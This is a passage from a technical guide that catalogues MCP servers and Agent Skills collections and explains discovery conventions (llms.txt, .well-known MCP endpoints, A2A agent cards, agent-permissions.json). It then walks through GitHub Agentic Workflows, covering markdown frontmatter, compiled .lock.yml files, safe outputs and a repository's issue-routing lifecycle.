GitLab MCP Server	Official	Project data access, issue management, repository operations via OAuth 2.0
Jira MCP Server	Community (sooperset/mcp-atlassian)	Issue tracking, automated ticket creation, task prioritisation
Linear MCP	Community	Issues, cycles, project updates; suited for high-velocity teams
Sentry MCP	Official	Real-time error tracking and performance issue context
Playwright MCP	Official (Microsoft)	Browser automation via accessibility snapshots; `npx @playwright/mcp@latest`
Docker Hub MCP	Official	Container orchestration and lifecycle management
Figma MCP (Dev Mode)	Official	Live Figma layer structure for design-to-code workflows
E2B MCP	Official	Secure cloud sandbox for Python and JavaScript code execution
Desktop Commander	Community	Terminal access, process management, advanced search

Databases

Server	Maintainer	Description
PostgreSQL MCP	Community (archived reference)	Read-only SQL queries, schema inspection, explain plans
Postgres MCP Pro	Community (CrystalDBA)	Configurable read/write access and performance analysis
SQLite MCP	Community	SQLite file operations, Datasette-compatible metadata
MongoDB Lens	Official (MongoDB)	Read-only querying, aggregation, schema inspection
DBHub	Community (Bytebase)	Zero-dependency server for PostgreSQL, MySQL, SQL Server, MariaDB, SQLite
MCP Toolbox for Databases	Official (Google)	Managed MCP for PostgreSQL on Google Cloud

Cloud Providers

Server	Maintainer	Description
AWS MCP Servers	Official	Multiple specialised servers for AWS services and best practices
Azure MCP Server	Official (Microsoft)	Azure resource management via natural language; RBAC and audit logging
Google Cloud MCP	Official	Servers for BigQuery, Google Maps, Compute Engine, Kubernetes Engine
Kubernetes MCP	Official (Microsoft/Azure)	Bridge between AI tools and Kubernetes clusters

Communication

Server	Maintainer	Description
Slack MCP Server	Official	Channel interaction, messaging automation, real-time notifications
Discord MCP Server	Community	Full CRUD on channels, forums, messages, webhooks
Gmail MCP	Community	Common Gmail operations
FastMail MCP	Community	Email, calendar, contacts via JMAP API

Document and Knowledge Management

Server	Maintainer	Description
Notion MCP	Official	Full workspace read/write, optimised for AI agents; hosted server with OAuth
Google Drive MCP	Community	Integration with Drive, Docs, Sheets, Slides
Confluence MCP	Community (sooperset/mcp-atlassian)	Atlassian Confluence page management for Cloud and Server editions

Search and Web

Server	Maintainer	Description
Brave Search MCP	Official	Privacy-focused search with comprehensive operator support
Exa MCP	Community	Semantic search, real-time web searches, live crawling
Tavily MCP	Community	Optimised for factual information with strong citation support
Perplexity MCP	Community	Semantic search for deeper research (paid API)
Context7 MCP	Community (Upstash)	Fetches current documentation through a documentation-as-context pipeline
Firecrawl MCP	Community	Converts URLs to clean Markdown by removing boilerplate
MCP Omnisearch	Community	Unified access to Tavily, Brave, Kagi, Perplexity, Jina AI, Exa, and Firecrawl

AI and ML Tools

Server	Maintainer	Description
Hugging Face MCP Server	Official	Search models, datasets, papers; connect to Gradio-based Spaces tools
Hugging Face Spaces MCP	Community	Interact directly with Hugging Face Spaces applications

Observability

Server	Maintainer	Description
Datadog MCP Server	Official	Bridge to Datadog metrics, traces, and logs
Grafana MCP Server	Official (open source)	Access Grafana instance data; supports read-only mode via `--disable-write`
Grafana MCP Observability	Official	Monitors MCP implementations themselves: protocol health, session management

Finance and Commerce

Server	Maintainer	Description
Financial Modeling Prep MCP	Official (FMP)	250+ tools covering equities, SEC filings, ETFs, macroeconomic indicators
Financial Datasets MCP	Official	Income statements, balance sheets, cash flows, historical prices
Stripe MCP	Official	100+ payment methods, documentation search, Stripe API interaction
Salesforce MCP Connector	Official	CRM data access, lead management, sales analytics
Shopify MCP	Community/Official	Agentic commerce interface; implements Universal Commerce Protocol (UCP)

Multi-App Aggregators

For teams that need broad integration without managing individual servers, aggregator servers connect to multiple services through a single MCP interface.

Server	Scale	Description
Pipedream	2,500+ integrations	Single MCP server connecting to thousands of APIs
Rube	500+ apps	Gmail, Slack, GitHub, Notion, and more through one server
MCPX	Enterprise-focused	Production-ready gateway for enterprise MCP deployment

Tip: Start with official servers when available — they receive faster security patches and are less likely to be abandoned. Use community servers for services that lack official support, but pin versions and review source code before deploying in production. For supply-chain controls, see Discovery and Imports.

MCP Apps: Interactive UI in Conversations

In January 2026, the MCP project announced MCP Apps, the first official MCP extension. Developed collaboratively by Anthropic, OpenAI, and the MCP-UI community, MCP Apps enable tools to return interactive UI components that render directly in the conversation, replacing plain-text responses with dashboards, forms, visualisations, and multi-step workflows.

The architecture uses two core primitives. First, tools include a _meta.ui.resourceUri field pointing to a UI resource. Second, UI resources are served via the ui:// scheme and contain bundled HTML and JavaScript. The host fetches resources, renders them in sandboxed iframes, and establishes bidirectional communication using JSON-RPC over postMessage.

Client support as of February 2026 includes Claude (web and desktop), ChatGPT, Goose, and Visual Studio Code Insiders. Available example implementations include 3D visualisation (threejs-server), interactive maps (map-server), document viewing (pdf-server), real-time dashboards (system-monitor-server), and music notation (sheet-music-server).

The @modelcontextprotocol/ext-apps NPM package provides the developer API for building MCP Apps.

Agent Skills Directory

The Agent Skills Standard

Agent Skills is an open standard proposed by Anthropic in December 2025. Skills are directories containing a SKILL.md file with YAML frontmatter and Markdown instructions, packaging procedural knowledge into reusable, portable modules that AI agents load dynamically. The specification lives at agentskills.io.

Skills work across Claude Code, OpenAI Codex, GitHub Copilot, Cursor, Gemini CLI, Windsurf, and other tools that honour the standard. The format uses progressive disclosure: metadata (roughly 100 tokens) is loaded at startup for all skills, the full SKILL.md body (recommended under 5,000 tokens) is loaded when the skill activates, and resource files in scripts/, references/, and assets/ directories are loaded on demand.

For detailed coverage of the SKILL.md format and design principles, see Skills and Tools Management.

Official Skill Collections

Anthropic (github.com/anthropics/skills, approximately 69,000 stars) publishes skills across four categories: document handling (DOCX, PPTX, XLSX, PDF processing), creative and design (frontend development patterns), development and technical (code-related workflows), and enterprise and communication (business workflows).

OpenAI (github.com/openai/skills) publishes skills focused on prototyping, documentation generation, code understanding, and CI/CD automation for use with Codex.

Vercel Engineering contributes React best practices, Next.js optimisation and upgrading, React Native performance, and web design guidelines.

Cloudflare contributes skills for AI agent development with stateful coordination, MCP server construction, Workers deployment, and web performance auditing.

Trail of Bits publishes over 23 security-focused skills covering cryptographic analysis, smart contract auditing, vulnerability detection, and compliance verification.

Pulumi publishes eight DevOps skills for infrastructure-as-code workflows.

Community Collections

Collection	Scale	Description
VoltAgent/awesome-agent-skills	339+ skills	Cross-platform, includes official skills from Anthropic, Vercel, Cloudflare, Trail of Bits, Google Labs, Hugging Face, Stripe, Microsoft, Supabase, Expo, and Sentry
sickn33/antigravity-awesome-skills	800+ skills	Battle-tested skills for Claude Code, Antigravity, and Cursor
hesreallyhim/awesome-claude-code	Varies	Skills, hooks, slash-commands, and agent orchestrators for Claude Code

Skill Registries

SkillRegistry.io is a browsable directory for SKILL.md files with 61 skills and over 3,000 downloads as of February 2026. ClawHub is the OpenClaw marketplace with over 3,000 skills, though it now requires identity verification and VirusTotal scanning after the ClawHavoc security incident (see Failure Modes, Testing, and Fixes). Skills can also be distributed as plain Git repositories without formal registry submission.

Security: The ToxicSkills Warning

In February 2026, Snyk researchers published the ToxicSkills report after scanning nearly 4,000 skills from public registries. They found that 13.4 percent had critical-level vulnerabilities and 76 contained confirmed malicious payloads. This underscores the importance of the supply-chain controls described in Discovery and Imports: pin versions, verify checksums, review source code, and prefer official skills from known publishers.

Warning: Do not blindly install skills from public registries into production environments. Apply the same supply-chain scrutiny you would to any third-party dependency: review source, check publisher identity, pin versions, and run in sandboxed environments when possible.

Announcing MCPs and Skills to Visiting Models

As AI agents increasingly browse the web, retrieve documentation, and interact with services, sites need machine-readable ways to advertise their capabilities. This section covers the current state-of-the-art conventions for announcing MCP servers, Agent Skills, and agent policies to visiting models.

llms.txt: Machine-Readable Site Context

The llms.txt convention, proposed by Jeremy Howard in September 2024, places a Markdown file at a site’s root path (/llms.txt) to provide LLM-friendly information about the site. The specification lives at llmstxt.org.

The format uses Markdown because it is the most widely understood format for language models. The structure is: an H1 heading with the project or site name (required), an optional blockquote with a short summary, optional body paragraphs, and H2-delimited sections containing lists of Markdown links. An optional “Optional” H2 section signals secondary information that can be omitted in shorter context windows.

Example 5.5-1. A minimal llms.txt file (illustrative)

# Acme API Documentation

> Acme provides a REST API for widget management. Use these docs
> to integrate widget creation, updates, and analytics.

## Docs
- [Authentication](https://docs.acme.com/auth.md): API keys and OAuth setup
- [Widgets API](https://docs.acme.com/widgets.md): Create, update, delete widgets
- [Webhooks](https://docs.acme.com/webhooks.md): Real-time event notifications

## MCP Server
- [Acme MCP Server](https://docs.acme.com/mcp.md): Connect via MCP for direct API access

## Optional
- [Rate Limits](https://docs.acme.com/rate-limits.md): Throttling and quota details
- [Changelog](https://docs.acme.com/changelog.md): Recent API changes

A companion llms-full.txt file can contain a comprehensive Markdown export of all documentation. Anthropic, for example, publishes both llms.txt (roughly 8,000 tokens) and llms-full.txt (roughly 480,000 tokens).

As of February 2026, over 780 sites have adopted llms.txt, including Cloudflare, Vercel, Coinbase, Anthropic, Stripe, and Mintlify. The spec also recommends serving Markdown versions of HTML pages at the same URL with .md appended. Adoption is strongest among developer tools and AI companies.

MCP Discovery via .well-known

MCP server discovery via .well-known endpoints is under active development through Spec Enhancement Proposals (SEPs), with target inclusion in the June 2026 specification release. Two key proposals define the emerging standard.

SEP-1960 proposes a /.well-known/mcp endpoint following RFC 8615 conventions. This endpoint returns a JSON document describing the server’s capabilities, transport endpoints, authentication requirements, rate limits, and security configuration.

Example 5.5-2. MCP discovery endpoint response (illustrative, based on SEP-1960)

{
  "mcp_version": "1.0",
  "server_name": "Acme MCP Server",
  "server_version": "2.1.0",
  "endpoints": {
    "streamable_http": "https://mcp.acme.com/mcp",
    "sse": "https://mcp.acme.com/sse"
  },
  "capabilities": {
    "tools": true,
    "resources": true,
    "prompts": true,
    "sampling": false
  },
  "authentication": {
    "required": true,
    "methods": ["oauth2", "api_key"],
    "oauth2": {
      "authorization_endpoint": "https://auth.acme.com/authorize",
      "token_endpoint": "https://auth.acme.com/token",
      "scopes_supported": ["mcp:read", "mcp:write"]
    }
  },
  "rate_limits": {
    "requests_per_minute": 60,
    "tokens_per_minute": 100000
  },
  "documentation": "https://docs.acme.com/mcp"
}

SEP-1649 proposes a more detailed MCP Server Card at /.well-known/mcp/server-card.json, which includes static tool and resource definitions for pre-connection discovery. The server card can also be exposed as an MCP resource at mcp://server-card.json.

The client discovery flow is: extract the server’s base URL, request GET /.well-known/mcp, validate any cryptographic signatures, confirm capability compatibility, configure authentication, and connect to the selected transport endpoint.

Note: These endpoints are at the SEP stage and not yet part of the released MCP specification. Implement them if you want to be ahead of the standard, but be prepared for changes before the June 2026 release.

A2A Agent Cards

The Agent-to-Agent (A2A) protocol, created by Google, defines an Agent Card as a JSON metadata document published at /.well-known/agent-card.json. Agent Cards enable agent-to-agent discovery by advertising an agent’s identity, capabilities, skills, endpoint, and authentication requirements.

Example 5.5-3. An A2A Agent Card (illustrative)

{
  "id": "acme-support-agent",
  "name": "Acme Support Agent",
  "description": "Handles customer inquiries about Acme products and services.",
  "provider": {
    "organization": "Acme Inc.",
    "url": "https://acme.com"
  },
  "url": "https://agents.acme.com/a2a",
  "capabilities": {
    "streaming": true,
    "pushNotifications": false
  },
  "skills": [
    {
      "id": "order-lookup",
      "name": "Order Lookup",
      "description": "Look up order status by order ID or customer email.",
      "inputModes": ["text/plain", "application/json"],
      "outputModes": ["application/json"]
    },
    {
      "id": "return-request",
      "name": "Return Request",
      "description": "Initiate a product return or exchange.",
      "inputModes": ["application/json"],
      "outputModes": ["application/json"]
    }
  ],
  "interfaces": [
    { "protocol": "a2a", "version": "1.0" }
  ],
  "securitySchemes": {
    "bearerAuth": { "type": "http", "scheme": "bearer" }
  },
  "security": [{ "bearerAuth": [] }]
}

Agent Cards support three discovery methods: the well-known URI (primary), curated registries with capability-based queries, and direct configuration for private systems. Authenticated extended cards can return richer information after the client authenticates.

For more on the A2A protocol, see Agent Orchestration and Agent Platform Comparison.

Agent Policies: robots.txt, ai.txt, and agent-permissions.json

Traditional robots.txt was designed for web crawlers and does not map cleanly to agentic use cases where AI systems interact with pages, fill forms, or take actions rather than simply indexing content.

Several conventions are emerging to fill this gap.

ai.txt was proposed by Spawning in May 2023 as a file at a site’s root that controls how AI systems use content for training purposes. Unlike robots.txt (read during crawling), ai.txt is read when media is downloaded for training and allows real-time permission adjustments. However, adoption remains low and the standard is fragmented across competing proposals from Spawning, Guardian News and Media (via IETF), and community projects.

agent-permissions.json, proposed by the Lightweight Agent Standards Working Group (LAS-WG), is a more technically rigorous standard published at /.well-known/agent-permissions.json. It covers interactive agent behaviours (clicking, form-filling, navigation) rather than just crawling. The format uses CSS-selector-based resource rules for specific verbs (click_element, submit_form, read_content, follow_link) combined with advisory action guidelines using RFC 2119 directives (MUST, SHOULD, MUST NOT).

Example 5.5-4. An agent-permissions.json fragment (illustrative, based on LAS-WG spec)

{
  "metadata": {
    "schema_version": "1.0",
    "last_updated": "2026-02-01",
    "author": "acme.com"
  },
  "strict": true,
  "resource_rules": [
    {
      "selector": "#purchase-button",
      "verb": "click_element",
      "allowed": false
    },
    {
      "selector": ".product-info",
      "verb": "read_content",
      "allowed": true,
      "modifiers": { "rate_limit": { "requests": 10, "period": "60s" } }
    }
  ],
  "action_guidelines": [
    {
      "directive": "MUST NOT",
      "description": "Create accounts without explicit human approval"
    }
  ]
}

Publishing to the MCP Registry

To make your MCP server discoverable through the official registry, you create a server.json manifest, authenticate with the registry CLI, and publish.

Example 5.5-5. Publishing an MCP server to the official registry (runnable)

# Install the publisher CLI
brew install mcp-publisher

# Initialise a server.json template
mcp-publisher init

# Authenticate (for io.github.* namespaces)
mcp-publisher login github

# Validate without publishing
mcp-publisher publish --dry-run

# Publish to the registry
mcp-publisher publish

The server.json manifest specifies the server name (using reverse-domain namespace), description, repository URL, version, and package details.

Example 5.5-6. A server.json manifest (illustrative)

{
  "$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
  "name": "io.github.acme/weather",
  "description": "An MCP server providing weather forecasts and alerts.",
  "repository": {
    "url": "https://github.com/acme/mcp-weather-server",
    "source": "github"
  },
  "version": "1.0.1",
  "packages": [
    {
      "registryType": "npm",
      "identifier": "@acme/mcp-weather-server",
      "version": "1.0.1",
      "transport": { "type": "stdio" }
    }
  ]
}

Namespace authentication uses GitHub OAuth for io.github.* namespaces and DNS TXT record verification for custom domain namespaces like com.acme.*. Each package type requires ownership validation: npm packages include an mcpName field in package.json, PyPI packages include mcp-name in README metadata, and Docker images use an OCI label.

For cloud-hosted servers accessible over the network, use the remotes field instead of packages:

{
  "name": "com.acme/weather-remote",
  "remotes": [
    {
      "transportType": "streamable-http",
      "url": "https://mcp.acme.com/weather"
    }
  ]
}

Publishing Agent Skills

Agent Skills can be distributed through multiple channels. The simplest method is publishing a Git repository with the correct directory structure (a directory containing SKILL.md with proper YAML frontmatter). Claude Code and other tools can install skills directly from repositories.

For wider distribution, publish to SkillRegistry.io (a browsable directory for SKILL.md files) or vendor-specific registries. The skills-ref validation tool can verify your skill structure before publishing:

skills-ref validate ./my-skill

Putting It All Together

A company that wants to make its services fully discoverable by AI agents can combine several of these mechanisms.

Example 5.5-7. Combined announcement strategy (illustrative)

https://acme.com/
├── llms.txt                           # LLM-readable site overview
├── llms-full.txt                      # Comprehensive documentation export
├── .well-known/
│   ├── mcp                            # MCP server discovery (SEP-1960)
│   ├── mcp/server-card.json           # MCP server card (SEP-1649)
│   ├── agent-card.json                # A2A Agent Card
│   └── agent-permissions.json         # Agent interaction policies
├── robots.txt                         # Traditional crawler rules
└── docs/
    ├── api.md                         # Markdown API documentation
    └── mcp.md                         # MCP server setup instructions

The llms.txt file points visiting models to the documentation. The .well-known/mcp endpoint tells agent runtimes how to connect to the MCP server. The A2A Agent Card enables other agents to discover and delegate tasks. The agent-permissions.json file sets boundaries on what visiting agents may do. Together, these mechanisms make the site a first-class participant in the agentic web.

Convention	File or Endpoint	What It Announces	Status (Feb 2026)
llms.txt	`/llms.txt`	Site context for LLMs (Markdown)	Community standard, 780+ sites
MCP Discovery	`/.well-known/mcp`	MCP server capabilities and transport	SEP stage, targeting June 2026
MCP Server Card	`/.well-known/mcp/server-card.json`	Detailed server metadata and tool definitions	SEP stage
A2A Agent Card	`/.well-known/agent-card.json`	Agent identity, skills, and endpoints	Released (A2A v1.0)
Agent Permissions	`/.well-known/agent-permissions.json`	What agents may and may not do on the site	LAS-WG proposal
MCP Registry	registry.modelcontextprotocol.io	Server discoverability via central index	Live preview (API v0.1)
Agent Skills	Git repos, SkillRegistry.io, ClawHub	Reusable skill packages	Released spec, multi-vendor

Key Takeaways

The MCP server ecosystem has grown to over 17,000 implementations, with major vendors now maintaining official servers that replace earlier community reference implementations. Agent Skills have achieved cross-platform portability across Claude Code, Codex, Copilot, Cursor, and Gemini CLI, with thousands of skills available through official and community collections. For announcing capabilities to visiting models, the current state of the art combines llms.txt for site context, .well-known/mcp for MCP server discovery (still in SEP stage), A2A Agent Cards for agent-to-agent discovery, and agent-permissions.json for interaction policies. Apply supply-chain security controls to all third-party MCP servers and skills: pin versions, verify publishers, and review source code before deploying in production. For MCP and Skills design principles, see Skills and Tools Management; for discovery taxonomy, see Discovery and Imports; for security incidents involving MCP and skills, see Failure Modes, Testing, and Fixes.

GitHub Agentic Workflows (GH-AW)

Chapter Preview

This chapter explains how GH-AW compiles markdown into deterministic workflows that GitHub Actions can execute. It shows how to set up GH-AW with the supported setup actions, including both vendored and upstream approaches. Finally, it highlights the safety controls that make agentic workflows production-ready: permissions, safe outputs, and approval gates.

Why GH-AW Matters

GitHub Agentic Workflows (GH-AW) (https://github.github.io/gh-aw/) turns natural language into automated repository agents that run inside GitHub Actions. Instead of writing large YAML pipelines by hand, you write markdown instructions that an AI agent executes with guardrails. The result is a workflow you can read like documentation but run like automation.

At a glance, GH-AW provides several key capabilities. Natural language workflows allow you to write markdown instructions that drive the agent’s behaviour, making automation readable to humans. Compile-time structure means your markdown is compiled into GitHub Actions workflows, ensuring reproducibility across runs. Security boundaries let you define permissions, tools, and safe outputs that constrain what the agent can and cannot do. Composable automation enables imports and shared components that you can reuse across repositories.

Core Workflow Structure

A GH-AW workflow is a markdown file with frontmatter and instructions:

---
on:
  issues:
    types: [opened]
permissions:
  contents: read
tools:
  edit:
  github:
    toolsets: [issues]
engine: copilot
---

# Triage this issue
Read issue #$ and summarize it.

Key parts:

The frontmatter section configures the workflow’s behaviour. The on field specifies GitHub Actions triggers such as issues, schedules, or dispatch events. The permissions field declares least-privilege access to GitHub APIs, ensuring the agent can only perform authorised operations. The tools field lists the capabilities your agent can invoke, such as edit, bash, web, or github. The engine field specifies the AI model or provider to use, such as Copilot, Claude Code, or Codex.

The markdown instructions section contains natural language steps for the agent to follow. You can include context variables from the event payload, such as issue number, PR number, or repository name, using template syntax.

Engine Selection Snapshot

GH-AW supports three practical coding-agent engine choices for GitHub-integrated workflows:

engine: copilot (default) with COPILOT_GITHUB_TOKEN
engine: claude with ANTHROPIC_API_KEY
engine: codex with OPENAI_API_KEY (many compiled workflows also accept CODEX_API_KEY as a fallback)

In this repository, staged workflows use engine-fallback dispatchers so execution can continue when one provider token is unavailable.

How GH-AW Runs

GH-AW compiles markdown workflows into .lock.yml GitHub Actions workflows. The compiled file is what GitHub actually executes, but the markdown remains the authoritative source. This gives you readable automation with predictable execution.

File Location

Both the source markdown files and the compiled .lock.yml files live in the .github/workflows/ directory:

.github/workflows/
|-- triage.md          # Source (human-editable)
|-- triage.lock.yml    # Compiled (auto-generated, do not edit)
|-- docs-refresh.md
`-- docs-refresh.lock.yml

Use gh aw compile (from the GH-AW CLI at https://github.com/github/gh-aw) in your repository root to generate .lock.yml files from your markdown sources. Only edit the .md files; the .lock.yml files are regenerated on compile.

If you do not vendor the GH-AW actions/ directory in your repository, you can instead reference the upstream setup action directly (pin to a commit SHA for security):

- name: Setup GH-AW scripts
  uses: github/gh-aw/actions/setup@5a4d651e3bd33de46b932d898c20c5619162332e
  with:
    destination: /opt/gh-aw/actions

Key Behaviors

There are three key behaviours to understand about the compilation model. First, frontmatter edits require recompile—any changes to triggers, permissions, tools, or engine settings must be followed by running gh aw compile to regenerate the lock file. Second, markdown instruction updates can often be edited directly because the runtime loads the markdown body at execution time; however, structural changes may still require recompilation. Third, shared components can be stored as markdown files without an on: trigger; these are imported rather than compiled, allowing reuse without duplication.

Compilation Pitfalls

GH-AW compilation is predictable, but a few pitfalls are common in real repositories.

Only compile workflow markdown. The compiler expects frontmatter with an on: trigger. Non-workflow files like AGENTS.md or general docs should not be passed to gh aw compile. Use gh aw compile <workflow-id> to target specific workflows when the directory includes other markdown files.

Strict mode rejects direct write permissions. GH-AW runs in strict mode by default; you can opt out by adding strict: false to the workflow frontmatter, but the recommended path is to keep strict mode on. Workflows that request issues: write, pull-requests: write, or contents: write will fail validation in strict mode. Use read-only permissions plus safe-outputs for labels, comments, and PR creation instead.

Compilation Model Examples

GH-AW compilation is mostly a structural translation: frontmatter becomes the workflow header, the markdown body is packaged as a script or prompt payload, and imports are inlined or referenced. The compiled .lock.yml is the contract GitHub Actions executes. The examples below show how a markdown workflow turns into a compiled job.

Example 1: Issue Triage Workflow

Source markdown (.github/workflows/triage.md)

---
on:
  issues:
    types: [opened]
permissions:
  contents: read
  issues: read
tools:
  github:
    toolsets: [issues]
safe-outputs:
  add-comment:
    max: 1
  add-labels:
    allowed: [needs-triage, needs-owner]
    max: 2
engine: copilot
---

# Triage this issue
Read issue #$ and summarize it.
Then suggest labels: needs-triage and needs-owner.

Compiled workflow (.github/workflows/triage.lock.yml)

name: GH-AW triage
on:
  issues:
    types: [opened]
permissions:
  contents: read
  issues: read
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout actions folder
        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6
        with:
          sparse-checkout: |
            actions
          persist-credentials: false
      - name: Setup GH-AW scripts
        uses: ./actions/setup
        with:
          destination: /opt/gh-aw/actions
      - name: Run GH-AW agent (generated)
        uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
        with:
          script: |
            const { setupGlobals } = require('/opt/gh-aw/actions/setup_globals.cjs');
            setupGlobals(core, github, context, exec, io);
            // Generated execution script omitted for brevity.

What changed during compilation

Frontmatter was converted into workflow metadata (on, permissions, jobs).
Generated steps reference the GH-AW scripts copied by the setup action.
The markdown body became the prompt payload executed by the agent runtime.
safe-outputs declarations were compiled into guarded output steps.

Example 2: Reusable Component + Import

Component (.github/workflows/shared/common-tools.md)

---
tools:
  bash:
  edit:
engine: copilot
---

Workflow using an import (.github/workflows/docs-refresh.md)

---
on:
  workflow_dispatch:
permissions:
  contents: read
imports:
  - shared/common-tools.md
safe-outputs:
  create-pull-request:
    max: 1
---

# Refresh docs
Update the changelog with the latest release notes.

Compiled workflow (.github/workflows/docs-refresh.lock.yml)

name: GH-AW docs refresh
on:
  workflow_dispatch:
permissions:
  contents: read
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout actions folder
        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6
        with:
          sparse-checkout: |
            actions
          persist-credentials: false
      - name: Setup GH-AW scripts
        uses: ./actions/setup
        with:
          destination: /opt/gh-aw/actions
      - name: Run GH-AW agent (generated)
        uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
        with:
          script: |
            const { setupGlobals } = require('/opt/gh-aw/actions/setup_globals.cjs');
            setupGlobals(core, github, context, exec, io);
            // Generated execution script omitted for brevity.

What changed during compilation

imports were resolved and merged with the workflow frontmatter.
The component’s tools and engine were applied to the final workflow.
Only workflows with on: are compiled; components remain markdown-only.
Read-only permissions pair with safe-outputs to stage changes safely.

Example 3: Safe Outputs in the Compiled Job

Source markdown (.github/workflows/release-notes.md)

---
on:
  workflow_dispatch:
permissions:
  contents: read
tools:
  edit:
safe-outputs:
  create-pull-request:
    max: 1
engine: copilot
---

# Draft release notes
Summarize commits since the last tag and propose a PR with the notes.

Compiled workflow (.github/workflows/release-notes.lock.yml)

name: GH-AW release notes
on:
  workflow_dispatch:
permissions:
  contents: read
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout actions folder
        uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6
        with:
          sparse-checkout: |
            actions
          persist-credentials: false
      - name: Setup GH-AW scripts
        uses: ./actions/setup
        with:
          destination: /opt/gh-aw/actions
      - name: Run GH-AW agent (generated)
        uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
        with:
          script: |
            const { setupGlobals } = require('/opt/gh-aw/actions/setup_globals.cjs');
            setupGlobals(core, github, context, exec, io);
            // Generated execution script omitted for brevity.

What changed during compilation

safe-outputs was translated into the generated safe-output scripts invoked by the job.
The prompt stayed identical; guardrails are enforced by the compiled job.

Tools, Safe Inputs, and Safe Outputs

GH-AW workflows are designed for safety by default. Agents run with minimal access and must declare tools explicitly.

Warning: Treat CI secrets and tokens as production credentials. Use least-privilege permissions, require human approval for write actions, and keep all agent actions auditable.

Tools

Tools are capabilities the agent can use. The edit tool allows the agent to modify files in the workspace. The bash tool runs shell commands, with safe commands enabled by default. The web-fetch and web-search tools allow the agent to fetch or search web content. The github tool operates on issues, pull requests, discussions, and projects. The playwright tool provides browser automation for UI checks.

In production policy discussions, distinguish open discovery from targeted retrieval. A workflow can disable broad internet search while still allowing GitHub-native search and retrieval of explicitly provided URLs on allowed domains through default MCP/browser capabilities.

Integration Surfaces on GitHub

When teams say “use Claude or Codex on GitHub,” they often mean different integration surfaces. Keep these separate in architecture decisions:

Surface	Typical trigger	Configuration locus	Best fit
Third-party agent in issues/PRs	Issue/PR interaction (agent UI, assignment, or agent-specific mention flow)	GitHub agent integration setup + repo permissions	Conversational analysis and iterative collaboration on a thread
Standard GitHub Action	Normal workflow events (`pull_request`, `issues`, `workflow_dispatch`, schedules)	YAML `uses:` steps (for example Claude/Codex actions) + secrets	Deterministic CI/CD automation with explicit step sequencing
GH-AW engine	GH-AW workflow trigger (`issues`, `workflow_dispatch`, etc.)	GH-AW frontmatter (`engine: copilot\|claude\|codex`) + compile pipeline	Multi-stage agentic workflows with guardrails (`safe-outputs`, tool controls, imports)

Related but separate: GitHub’s first-party coding-agent assignment path (for example assigning to copilot-swe-agent) is neither a third-party action wrapper nor GH-AW engine selection.

A practical pattern is hybrid orchestration: use standard workflows for intake and dispatch, GH-AW for routed autonomous stages, and issue/PR agent interactions when humans want direct thread-level collaboration.

Safe Outputs

Write actions (creating issues, comments, commits) can be routed through safe outputs to sanitize what the agent writes. This keeps the core job read-only and limits accidental changes.

In strict mode, safe outputs are required for write operations. Declare them in frontmatter to specify what the agent can produce:

safe-outputs:
  add-comment:
    max: 1
  add-labels:
    allowed: [needs-triage, needs-owner]
    max: 2
  create-pull-request:
    max: 1

The agent generates structured output that downstream steps apply, keeping repository writes explicit and auditable.

max caps how many outputs of a given type are accepted; extra outputs are rejected by the safe-output validator.

When using add-labels, keep the allowed list in sync with labels that already exist in the repository; missing labels cause runtime output failures when the safe-output job applies them.

For label-triggered workflow chains, writes from the default GITHUB_TOKEN may not emit downstream workflow-triggering events. In those cases, configure safe-outputs.github-token to use a dedicated repository-scoped user token (for this repository, GH_AW_GITHUB_TOKEN).

Safe Inputs

You can define safe inputs to structure what the agent receives. This is a good place to validate schema-like data for tools or commands.

Imports and Reusable Components

For terminology and trust-model definitions, see Discovery and Imports. This section focuses only on GH-AW-specific syntax and composition patterns.

GH-AW supports imports in two ways:

Frontmatter imports

imports:
  - shared/common-tools.md
  - shared/research-library.md

Markdown directive

{{#import shared/common-tools.md}}

In GH-AW, these imports are typically workflow-fragment artefacts: shared prompts, tool declarations, and policy snippets. Keep reusable fragments in files without on: so they can be imported as components rather than compiled as standalone workflows.

ResearchPlanAssign: A Pattern for Self-Maintaining Books

GH-AW documents a ResearchPlanAssign strategy: a scaffolded loop that keeps humans in control while delegating research and execution to agents.

Phase 1: Research. A scheduled agent scans the repository or ecosystem for updates such as new libraries, frameworks, or scaffolds. It produces a report in an issue or discussion, summarising findings and flagging items that may warrant attention.

Phase 2: Plan. Maintainers review the report and decide whether to proceed. If approved, a planning agent drafts the implementation steps, breaking the work into discrete tasks that can be assigned and tracked.

Phase 3: Assign and Implement. Agents are assigned to implement the approved changes. Updates are validated through tests and reviews, committed to the repository, and published to the appropriate outputs.

This pattern maps well to this book: use scheduled research to discover new agentic tooling, post a proposal issue, build consensus, then update the chapters and blog.

Applying GH-AW to This Repository

This repository uses a hybrid lifecycle documented in WORKFLOW_PLAYBOOK.md: a standard intake ACK workflow followed by GH-AW routing and label-driven downstream stages.

Intake ACK + dispatch. When an issue is opened, a standard workflow (issue-intake-ack.yml) posts acknowledgment, adds acknowledged, and dispatches issue-routing-decision.lock.yml with the issue number.

Routing decision. The GH-AW routing workflow runs on workflow_dispatch, verifies acknowledged, and adds either triaged-fast-track or triaged-for-research (or rejects). Its concurrency key is scoped by issue number so concurrent intake events do not cancel each other.

Fast-track lane. Issues labeled triaged-fast-track are implemented directly by the fast-track workflow, which opens a PR, adds assigned, and closes the issue.

Research lane. Issues labeled triaged-for-research move to researched-waiting-opinions, then run two long-task phases in sequence (phase-1-complete then phase-2-complete) selected by engine-fallback dispatchers. After phase 2 completes, the assignment workflow adds assigned and closes the issue.

Token boundary. Downstream label-triggered stages rely on safe-outputs writes that use a PAT-backed token (GH_AW_GITHUB_TOKEN) so label events trigger subsequent workflows.

Rejection path. At any stage, an agent can add rejected with rationale and close the issue.

Publishing and validation remain separate automation concerns. pages.yml deploys the site and build-pdf.yml maintains the generated PDF. check-links.yml and check-external-links.yml validate internal and external links. compile-workflows.yml verifies that .lock.yml files stay in sync with their markdown sources. copilot-setup-steps.yml configures the coding agent environment.

